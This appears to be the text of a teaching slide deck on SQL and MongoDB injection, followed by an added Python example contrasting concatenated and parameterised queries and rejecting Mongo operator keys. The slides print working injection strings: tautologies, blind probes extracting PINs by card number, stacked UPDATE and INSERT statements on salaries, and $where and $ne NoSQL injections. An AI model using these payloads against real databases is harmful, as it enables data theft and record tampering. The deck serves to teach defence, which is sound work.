SQL and NoSQL Injection
Lavanya Mohan
Sailee Bhekare
Techniques for Exploiting SQL Injection
- Fingerprinting the DB
- String SQL Injection
- Numeric SQL Injection
- Blind Numeric Injection
- Blind String Injection
Fingerprinting the DB
String SQL Injection
Original query:
Select * from user_data where last_name = 'Smith'
Injected value:
Smith' OR '1'='1
Resulting query:
Select * from user_data where last_name = 'Smith' OR '1'='1'
Numeric SQL Injection
Select * from weather_data where station = 101 OR 1=1
Blind Numeric SQL Injection
101 AND ((Select pin from pins where cc_number='1111222233334444')>2500)
Blind String SQL Injection
101 AND ((Select name from pins where cc_number='4321432143214321')>'E');
More on SQL Injection
- Update
- Insert
Update
jsmith'; Update SALARIES SET SALARY='50000' where USERID='jsmith
Insert
Select * from SALARIES where USERID = 'jsmith'
jsmith'; Insert into SALARIES VALUES ('hpotter','10000000');--
Is NoSQL = No Injections??
Example Of MongoDB NoSQL Injection
Typical User Form:
db.characters.find({"name" : "Robb"})
Example 1 :
db.characters.find({ name : 'Robb', $where: 'function() { sleep(5000); return this.name=="Robb"}' })
Example 2 :
Using String Manipulation
db.characters.find({name:'abd', name:{$ne: 'Robb'}, address:'Casterly Rock'})
Parameterised Queries
SQL
NoSQL
Input Validation
Use Appropriate Privileges
Proper Error Messages
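As an added example (not code from the slides), the String SQL Injection payload is run against a constructed in-memory SQLite copy of user_data, once through a concatenated query and once through a parameterised one, and the MongoDB side shows the type and operator-key checks that keep an injected {$ne: ...} or $where clause out of find(). The function names make_db, find_vulnerable, find_parameterised, mongo_name_filter and reject_operators are chosen here, not taken from the deck.

```python
import sqlite3

def make_db():
    # Constructed in-memory table mirroring the slides' user_data example.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO user_data VALUES (?, ?, ?)",
                     [(1, "Joe", "Smith"), (2, "John", "Wayne"), (3, "Jane", "Plane")])
    return conn

def find_vulnerable(conn, last_name):
    # The slides' pattern: the value is spliced into the SQL text, so
    # Smith' OR '1'='1 turns the WHERE clause into a tautology.
    sql = "SELECT * FROM user_data WHERE last_name = '" + last_name + "'"
    return conn.execute(sql).fetchall()

def find_parameterised(conn, last_name):
    # Placeholder binding: the driver passes the value separately from the
    # statement, so the same payload is just a last name that matches nothing.
    sql = "SELECT * FROM user_data WHERE last_name = ?"
    return conn.execute(sql, (last_name,)).fetchall()

def mongo_name_filter(name):
    # NoSQL side: build the filter as an object, never by string manipulation,
    # and accept only a plain string so an injected object such as
    # {"$ne": "Robb"} or an extra $where clause never reaches find().
    if not isinstance(name, str):
        raise ValueError("name must be a string")
    return {"name": name}

def reject_operators(doc):
    # Defensive check for filters assembled from parsed JSON bodies: any key
    # starting with "$" (e.g. $ne, $where) is a query operator, not data.
    if isinstance(doc, dict):
        for key, value in doc.items():
            if key.startswith("$"):
                raise ValueError("operator key not allowed: " + key)
            reject_operators(value)
    elif isinstance(doc, list):
        for item in doc:
            reject_operators(item)
    return doc
```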